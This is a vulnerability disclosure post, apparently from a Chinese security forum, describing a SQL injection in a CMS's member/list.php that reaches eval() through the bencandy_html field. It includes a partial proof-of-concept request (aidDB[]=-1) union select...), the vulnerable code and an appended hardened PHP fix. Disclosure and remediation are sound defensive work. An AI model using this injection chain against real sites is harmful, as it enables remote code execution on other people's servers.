By k4shifz [w.s.t]
bbs.wolvez.org
From a search, there appears to be a problem with the previously published vulnerability. This one is of limited use and requires the following conditions:
1. Website configuration: true or static file generation
2. Member registration is allowed
Test code for v6 is given below. After it is submitted, phpinfo() is executed. v7 works on the same principle, but the number of database fields is different.
member/list.php?step=2&Type=delete&aidDB[]=-1)%20union%20select%,
0x01 vulnerability in make_more_article_html:
function make_more_article_html($comebackurl='/',$type='',$aidDB=''){
    global $db,$pre,$webdb,$webdb,$showHtml_Type;
    if($webdb[NewsMakeHtml]!=1||$aidDB=='') // $webdb[NewsMakeHtml]: static
    {return ;}
    ...
    // $string ends up inside IN (...) without quoting
    $query=$db->query("SELECT A.*,B.bencandy_html,B.list_html,D.aid FROM {$pre}article_db D LEFT JOIN {$pre}article A ON D.aid=A.aid LEFT JOIN {$pre}sort B ON A.fid=B.fid WHERE D.aid IN ($string)");
    while($rs=$db->fetch_array($query)){
        ...
        $filename_b=$rs[bencandy_html];
        ...
        // the bencandy_html value from the query result is evaluated as PHP
        eval("\$showurl=\"$filename_b\";");
        ...
0x02 The vulnerable function is called in member/list.php:
if($step==2){
    ...
    if($Type=='delete'){
        make_more_article_html("$FROMURL","del_0",$aidDB);
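
A hardened form of the two flaws shown above, as an added example that is not the CMS's own code: the id list is reduced to integers before it reaches `IN (...)`, and the URL template is expanded by literal substitution instead of `eval()`. The function names, the `$fid`/`$aid` placeholder set and the sample values are assumptions; the page elides how `$string` is built from `$aidDB`.

```php
<?php
// Added example, not the CMS's own code. Function names and the
// placeholder set are hypothetical.

/**
 * Reduce a request-supplied id list to positive integers so that nothing
 * but digits and commas can reach "IN (...)".
 */
function safe_id_list($aidDB): string
{
    $ids = [];
    foreach ((array)$aidDB as $v) {
        // ctype_digit() rejects a value such as "-1) union select" outright
        // instead of silently truncating it the way intval() would.
        if (is_string($v) && ctype_digit($v) && (int)$v > 0) {
            $ids[(int)$v] = true;
        } elseif (is_int($v) && $v > 0) {
            $ids[$v] = true;
        }
    }
    return implode(',', array_keys($ids));
}

/**
 * Expand a URL template by literal substitution instead of eval().
 * Only the listed placeholders are replaced; any other text in the
 * template stays inert and is never executed.
 */
function render_url_template(string $tpl, array $vars): string
{
    $map = [];
    foreach ($vars as $name => $value) {
        $map['$' . $name] = rawurlencode((string)$value);
    }
    return strtr($tpl, $map);
}

// Constructed sample input modelled on the aidDB[] request parameter.
$aidDB  = ['12', '-1) union select', '7', ['nested']];
$string = safe_id_list($aidDB);
if ($string === '') {
    exit("no valid ids\n");   // refuse to build the query at all
}
echo "IN ($string)\n";

// Constructed row standing in for one result of the query above.
$rs = ['aid' => 12, 'fid' => 3, 'bencandy_html' => 'html/$fid/$aid.htm'];
echo render_url_template($rs['bencandy_html'], ['fid' => $rs['fid'], 'aid' => $rs['aid']]), "\n";
```

Either fix alone breaks the chain described on this page, but both are needed: the integer filter closes the injection point, and dropping `eval()` means a tampered `bencandy_html` value cannot become code.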